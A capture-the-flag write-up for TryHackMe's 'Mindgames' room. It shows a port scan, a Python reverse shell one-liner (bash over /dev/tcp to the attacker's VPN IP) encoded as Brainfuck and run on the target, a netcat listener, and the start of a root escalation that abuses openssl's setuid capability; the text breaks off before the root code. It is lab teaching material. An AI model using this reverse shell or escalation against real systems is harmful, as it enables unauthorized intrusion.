Mindgames — TryHackMe — Writeup

TonyRahmos

4 min readNov 25, 2020

Hello. I’m Rahmos. Here is my Mindgames — TryHackMe — Writeup. Check it out!

First, deploy the machine and nmap for opend ports:

nmap -A -T4 -p- -v <ip>

There are 2 ports opened: 22 (SSH) and 80 (HTTP).

First, let’s access the website.

Okay so it’s many lines of Brainfuck program language. And also a box for us to run code. I try to paste the “Hello,World” Brainfuck line and it works!

That means you need to convert your Python code to Brainfuck language, and it can be executed here. So if I convert my python reverse shell code to Brainfuck and run, maybe I’ll get the shell also! Note that it can only run by Python, not other language.

I will use this link to decode or encode my Python code to Brainfuck. So here’s my Python code:

import os
os.system(‘bash -c “bash -i >& /dev/tcp/<my-VPN-ip>/4444 0>&1”’)

Put these lines to the link above and click encrypt, you will get the Brainfuck code back.

Start a listener on your machine:

nc -lvnp 4444

Then paste the Brainfuck code to the website and run, you will have the shell!

Now I’m in! Move around and get the 1st flag:

Now I’ll find a way to own root and get the final flag. Spawn a tty shell for stability using Python:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

First, let’s try sudo -l to see if mindgames can run sudo:

Uh oh! I haven’t known mindgames’s password yet, so I cannot run sudo now. Let’s try another way. This time, use Capabilities:

getcap -r / 2>/dev/null

The “openssl” has the setuid cap. Which means, I can use openssl to setuid to 0 (root’s uid) and become root. Look at openssl | GTFOBins:

OpenSSL can execute code via a library. So, I can code a simple C program to setuid(0), compile it to a library and use Openssl to exec it. I’ll use this link for reference.

My program will look like this: